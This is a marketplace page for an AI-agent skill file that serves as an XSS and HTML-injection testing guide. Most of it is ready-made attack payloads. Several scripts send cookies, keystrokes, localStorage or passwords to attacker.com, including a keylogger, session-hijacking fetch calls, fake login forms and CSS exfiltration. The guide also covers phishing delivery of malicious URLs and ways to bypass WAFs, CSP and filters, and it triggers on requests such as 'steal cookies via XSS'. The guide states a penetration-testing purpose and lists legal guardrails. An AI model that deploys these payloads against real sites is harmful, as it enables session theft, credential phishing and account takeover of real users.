How do I install Cross-Site Scripting and HTML Injection Testing?

Install Cross-Site Scripting and HTML Injection Testing with a single command: npx mdskills install sickn33/xss-html-injection. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Cross-Site Scripting and HTML Injection Testing?

Cross-Site Scripting and HTML Injection Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Cross-Site Scripting and HTML Injection Testing

Name: Cross-Site Scripting and HTML Injection Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.

by @sickn331 installs0Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/xss-html-injection

Fork & Edit

Skill Advisor8.0

Comprehensive XSS testing guide with detailed payloads and bypass techniques

+Provides extensive, actionable testing phases with concrete payloads
+Covers all XSS types with clear detection and exploitation workflows
+Includes practical filter bypass techniques and encoding variations
-Declares shell execution permission without any shell commands in workflow
-Lacks specific trigger conditions for when agent should activate this skill

SKILL.md

Edit in Browser

1---
2name: Cross-Site Scripting and HTML Injection Testing
3description: This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Cross-Site Scripting and HTML Injection Testing
10 
11## Purpose
12 
13Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.
14 
15## Inputs / Prerequisites
16 
17### Required Access
18- Target web application URL with user input fields
19- Burp Suite or browser developer tools for request analysis
20- Access to create test accounts for stored XSS testing
21- Browser with JavaScript console enabled
22 
23### Technical Requirements
24- Understanding of JavaScript execution in browser context
25- Knowledge of HTML DOM structure and manipulation
26- Familiarity with HTTP request/response headers
27- Understanding of cookie attributes and session management
28 
29### Legal Prerequisites
30- Written authorization for security testing
31- Defined scope including target domains and features
32- Agreement on handling of any captured session data
33- Incident response procedures established
34 
35## Outputs / Deliverables
36 
37- XSS/HTMLi vulnerability report with severity classifications
38- Proof-of-concept payloads demonstrating impact
39- Session hijacking demonstrations (controlled environment)
40- Remediation recommendations with CSP configurations
41 
42## Core Workflow
43 
44### Phase 1: Vulnerability Detection
45 
46#### Identify Input Reflection Points
47Locate areas where user input is reflected in responses:
48 
49```
50# Common injection vectors
51- Search boxes and query parameters
52- User profile fields (name, bio, comments)
53- URL fragments and hash values
54- Error messages displaying user input
55- Form fields with client-side validation only
56- Hidden form fields and parameters
57- HTTP headers (User-Agent, Referer)
58```
59 
60#### Basic Detection Testing
61Insert test strings to observe application behavior:
62 
63```html
64<!-- Basic reflection test -->
65<test123>
66 
67<!-- Script tag test -->
68<script>alert('XSS')</script>
69 
70<!-- Event handler test -->
71<img src=x onerror=alert('XSS')>
72 
73<!-- SVG-based test -->
74<svg onload=alert('XSS')>
75 
76<!-- Body event test -->
77<body onload=alert('XSS')>
78```
79 
80Monitor for:
81- Raw HTML reflection without encoding
82- Partial encoding (some characters escaped)
83- JavaScript execution in browser console
84- DOM modifications visible in inspector
85 
86#### Determine XSS Type
87 
88**Stored XSS Indicators:**
89- Input persists after page refresh
90- Other users see injected content
91- Content stored in database/filesystem
92 
93**Reflected XSS Indicators:**
94- Input appears only in current response
95- Requires victim to click crafted URL
96- No persistence across sessions
97 
98**DOM-Based XSS Indicators:**
99- Input processed by client-side JavaScript
100- Server response doesn't contain payload
101- Exploitation occurs entirely in browser
102 
103### Phase 2: Stored XSS Exploitation
104 
105#### Identify Storage Locations
106Target areas with persistent user content:
107 
108```
109- Comment sections and forums
110- User profile fields (display name, bio, location)
111- Product reviews and ratings
112- Private messages and chat systems
113- File upload metadata (filename, description)
114- Configuration settings and preferences
115```
116 
117#### Craft Persistent Payloads
118 
119```html
120<!-- Cookie stealing payload -->
121<script>
122document.location='http://attacker.com/steal?c='+document.cookie
123</script>
124 
125<!-- Keylogger injection -->
126<script>
127document.onkeypress=function(e){
128  new Image().src='http://attacker.com/log?k='+e.key;
129}
130</script>
131 
132<!-- Session hijacking -->
133<script>
134fetch('http://attacker.com/capture',{
135  method:'POST',
136  body:JSON.stringify({cookies:document.cookie,url:location.href})
137})
138</script>
139 
140<!-- Phishing form injection -->
141<div id="login">
142<h2>Session Expired - Please Login</h2>
143<form action="http://attacker.com/phish" method="POST">
144Username: <input name="user"><br>
145Password: <input type="password" name="pass"><br>
146<input type="submit" value="Login">
147</form>
148</div>
149```
150 
151### Phase 3: Reflected XSS Exploitation
152 
153#### Construct Malicious URLs
154Build URLs containing XSS payloads:
155 
156```
157# Basic reflected payload
158https://target.com/search?q=<script>alert(document.domain)</script>
159 
160# URL-encoded payload
161https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E
162 
163# Event handler in parameter
164https://target.com/page?name="><img src=x onerror=alert(1)>
165 
166# Fragment-based (for DOM XSS)
167https://target.com/page#<script>alert(1)</script>
168```
169 
170#### Delivery Methods
171Techniques for delivering reflected XSS to victims:
172 
173```
1741. Phishing emails with crafted links
1752. Social media message distribution
1763. URL shorteners to obscure payload
1774. QR codes encoding malicious URLs
1785. Redirect chains through trusted domains
179```
180 
181### Phase 4: DOM-Based XSS Exploitation
182 
183#### Identify Vulnerable Sinks
184Locate JavaScript functions that process user input:
185 
186```javascript
187// Dangerous sinks
188document.write()
189document.writeln()
190element.innerHTML
191element.outerHTML
192element.insertAdjacentHTML()
193eval()
194setTimeout()
195setInterval()
196Function()
197location.href
198location.assign()
199location.replace()
200```
201 
202#### Identify Sources
203Locate where user-controlled data enters the application:
204 
205```javascript
206// User-controllable sources
207location.hash
208location.search
209location.href
210document.URL
211document.referrer
212window.name
213postMessage data
214localStorage/sessionStorage
215```
216 
217#### DOM XSS Payloads
218 
219```javascript
220// Hash-based injection
221https://target.com/page#<img src=x onerror=alert(1)>
222 
223// URL parameter injection (processed client-side)
224https://target.com/page?default=<script>alert(1)</script>
225 
226// PostMessage exploitation
227// On attacker page:
228<iframe src="https://target.com/vulnerable"></iframe>
229<script>
230frames[0].postMessage('<img src=x onerror=alert(1)>','*');
231</script>
232```
233 
234### Phase 5: HTML Injection Techniques
235 
236#### Reflected HTML Injection
237Modify page appearance without JavaScript:
238 
239```html
240<!-- Content injection -->
241<h1>SITE HACKED</h1>
242 
243<!-- Form hijacking -->
244<form action="http://attacker.com/capture">
245<input name="credentials" placeholder="Enter password">
246<button>Submit</button>
247</form>
248 
249<!-- CSS injection for data exfiltration -->
250<style>
251input[value^="a"]{background:url(http://attacker.com/a)}
252input[value^="b"]{background:url(http://attacker.com/b)}
253</style>
254 
255<!-- iframe injection -->
256<iframe src="http://attacker.com/phishing" style="position:absolute;top:0;left:0;width:100%;height:100%"></iframe>
257```
258 
259#### Stored HTML Injection
260Persistent content manipulation:
261 
262```html
263<!-- Marquee disruption -->
264<marquee>Important Security Notice: Your account is compromised!</marquee>
265 
266<!-- Style override -->
267<style>body{background:red !important;}</style>
268 
269<!-- Hidden content with CSS -->
270<div style="position:fixed;top:0;left:0;width:100%;background:white;z-index:9999;">
271Fake login form or misleading content here
272</div>
273```
274 
275### Phase 6: Filter Bypass Techniques
276 
277#### Tag and Attribute Variations
278 
279```html
280<!-- Case variation -->
281<ScRiPt>alert(1)</sCrIpT>
282<IMG SRC=x ONERROR=alert(1)>
283 
284<!-- Alternative tags -->
285<svg/onload=alert(1)>
286<body/onload=alert(1)>
287<marquee/onstart=alert(1)>
288<details/open/ontoggle=alert(1)>
289<video><source onerror=alert(1)>
290<audio src=x onerror=alert(1)>
291 
292<!-- Malformed tags -->
293<img src=x onerror=alert(1)//
294<img """><script>alert(1)</script>">
295```
296 
297#### Encoding Bypass
298 
299```html
300<!-- HTML entity encoding -->
301<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
302 
303<!-- Hex encoding -->
304<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>
305 
306<!-- Unicode encoding -->
307<script>\u0061lert(1)</script>
308 
309<!-- Mixed encoding -->
310<img src=x onerror=\u0061\u006cert(1)>
311```
312 
313#### JavaScript Obfuscation
314 
315```javascript
316// String concatenation
317<script>eval('al'+'ert(1)')</script>
318 
319// Template literals
320<script>alert`1`</script>
321 
322// Constructor execution
323<script>[].constructor.constructor('alert(1)')()</script>
324 
325// Base64 encoding
326<script>eval(atob('YWxlcnQoMSk='))</script>
327 
328// Without parentheses
329<script>alert`1`</script>
330<script>throw/a]a]/.source+onerror=alert</script>
331```
332 
333#### Whitespace and Comment Bypass
334 
335```html
336<!-- Tab/newline insertion -->
337<img src=x	onerror
338=alert(1)>
339 
340<!-- JavaScript comments -->
341<script>/**/alert(1)/**/</script>
342 
343<!-- HTML comments in attributes -->
344<img src=x onerror="alert(1)"<!--comment-->
345```
346 
347## Quick Reference
348 
349### XSS Detection Checklist
350```
3511. Insert <script>alert(1)</script> → Check execution
3522. Insert <img src=x onerror=alert(1)> → Check event handler
3533. Insert "><script>alert(1)</script> → Test attribute escape
3544. Insert javascript:alert(1) → Test href/src attributes
3555. Check URL hash handling → DOM XSS potential
356```
357 
358### Common XSS Payloads
359 
360| Context | Payload |
361|---------|---------|
362| HTML body | `<script>alert(1)</script>` |
363| HTML attribute | `"><script>alert(1)</script>` |
364| JavaScript string | `';alert(1)//` |
365| JavaScript template | `${alert(1)}` |
366| URL attribute | `javascript:alert(1)` |
367| CSS context | `</style><script>alert(1)</script>` |
368| SVG context | `<svg onload=alert(1)>` |
369 
370### Cookie Theft Payload
371```javascript
372<script>
373new Image().src='http://attacker.com/c='+btoa(document.cookie);
374</script>
375```
376 
377### Session Hijacking Template
378```javascript
379<script>
380fetch('https://attacker.com/log',{
381  method:'POST',
382  mode:'no-cors',
383  body:JSON.stringify({
384    cookies:document.cookie,
385    localStorage:JSON.stringify(localStorage),
386    url:location.href
387  })
388});
389</script>
390```
391 
392## Constraints and Guardrails
393 
394### Operational Boundaries
395- Never inject payloads that could damage production systems
396- Limit cookie/session capture to demonstration purposes only
397- Avoid payloads that could spread to unintended users (worm behavior)
398- Do not exfiltrate real user data beyond scope requirements
399 
400### Technical Limitations
401- Content Security Policy (CSP) may block inline scripts
402- HttpOnly cookies prevent JavaScript access
403- SameSite cookie attributes limit cross-origin attacks
404- Modern frameworks often auto-escape outputs
405 
406### Legal and Ethical Requirements
407- Written authorization required before testing
408- Report critical XSS vulnerabilities immediately
409- Handle captured credentials per data protection agreements
410- Do not use discovered vulnerabilities for unauthorized access
411 
412## Examples
413 
414### Example 1: Stored XSS in Comment Section
415 
416**Scenario**: Blog comment feature vulnerable to stored XSS
417 
418**Detection**:
419```
420POST /api/comments
421Content-Type: application/json
422 
423{"body": "<script>alert('XSS')</script>", "postId": 123}
424```
425 
426**Observation**: Comment renders and script executes for all viewers
427 
428**Exploitation Payload**:
429```html
430<script>
431var i = new Image();
432i.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
433</script>
434```
435 
436**Result**: Every user viewing the comment has their session cookie sent to attacker's server.
437 
438### Example 2: Reflected XSS via Search Parameter
439 
440**Scenario**: Search results page reflects query without encoding
441 
442**Vulnerable URL**:
443```
444https://shop.example.com/search?q=test
445```
446 
447**Detection Test**:
448```
449https://shop.example.com/search?q=<script>alert(document.domain)</script>
450```
451 
452**Crafted Attack URL**:
453```
454https://shop.example.com/search?q=%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/log?c='+document.cookie)%22%3E
455```
456 
457**Delivery**: URL sent via phishing email to target user.
458 
459### Example 3: DOM-Based XSS via Hash Fragment
460 
461**Scenario**: JavaScript reads URL hash and inserts into DOM
462 
463**Vulnerable Code**:
464```javascript
465document.getElementById('welcome').innerHTML = 'Hello, ' + location.hash.slice(1);
466```
467 
468**Attack URL**:
469```
470https://app.example.com/dashboard#<img src=x onerror=alert(document.cookie)>
471```
472 
473**Result**: Script executes entirely client-side; payload never touches server.
474 
475### Example 4: CSP Bypass via JSONP Endpoint
476 
477**Scenario**: Site has CSP but allows trusted CDN
478 
479**CSP Header**:
480```
481Content-Security-Policy: script-src 'self' https://cdn.trusted.com
482```
483 
484**Bypass**: Find JSONP endpoint on trusted domain:
485```html
486<script src="https://cdn.trusted.com/api/jsonp?callback=alert"></script>
487```
488 
489**Result**: CSP bypassed using allowed script source.
490 
491## Troubleshooting
492 
493| Issue | Solutions |
494|-------|-----------|
495| Script not executing | Check CSP blocking; verify encoding; try event handlers (img, svg onerror); confirm JS enabled |
496| Payload appears but doesn't execute | Break out of attribute context with `"` or `'`; check if inside comment; test different contexts |
497| Cookies not accessible | Check HttpOnly flag; try localStorage/sessionStorage; use no-cors mode |
498| CSP blocking payloads | Find JSONP on whitelisted domains; check for unsafe-inline; test base-uri bypass |
499| WAF blocking requests | Use encoding variations; fragment payload; null bytes; case variations |
500

Full transparency — inspect the skill content before installing.